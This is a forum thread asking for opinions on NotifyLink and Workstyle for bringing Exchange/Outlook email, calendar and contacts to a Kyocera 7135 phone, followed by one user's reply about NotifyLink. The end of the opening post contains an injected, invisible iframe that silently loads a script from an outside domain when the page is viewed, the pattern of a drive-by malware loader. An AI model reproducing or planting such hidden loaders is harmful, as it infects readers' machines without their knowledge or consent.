+ Reply to Thread

Opinions and info on wireless Outlook

I'm looking for info and opinions from those of you who are using a product like Notifylink and/or Workstyle (desktop or enterprise).

I work as an asset manager for an MIS shop in NYC and like most of you, I've been waiting for this phone for some time. We operate an Exchange e-mail server and would like to see the level of wireless connectivity so that I effectively have Outlook on my 7135 (if I had one).

Both of these packages talk about sending e-mail, contacts, calendar and tasks to the phone. But how (and how well) do they actually work?

I'm not expecting an always on connection, but do I need to poll the server every 5 minutes to look for any activity? (that would be a problem w/ using too many minutes). Is there a difference between using a QNC connection and Express Network (other than the speed)?

Can I change meetings and accept e-mailed appointment requests? Can I send appointment requests?

I had looked at the Treo 300 because of Sprint's business connect. But in the end decided against it because of the superior service of Verizon (IMO).

I know there are packages like Snappermail, but I'm really looking at how to get as much Outlook functionality onto the 7135 as possible and not just e-mail. I've read some of the comments posted on these packages in various threads. But I wanted to start a dicussion solely on them.

Also, please point out what is missing in these packages. That can be extremely valuable as well.

Thanks in advance. <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Opinions and info on wireless Outlook

Steve

Been using NotifyLink for about 3 weeks now. It's a good application for what I need, but does eat some minutes up.

I use it on QNC as ALLTEL has no other option at this point.

It pushes e-mail quickly...within seconds of coming in. The installation was easy and required no help from my IT department.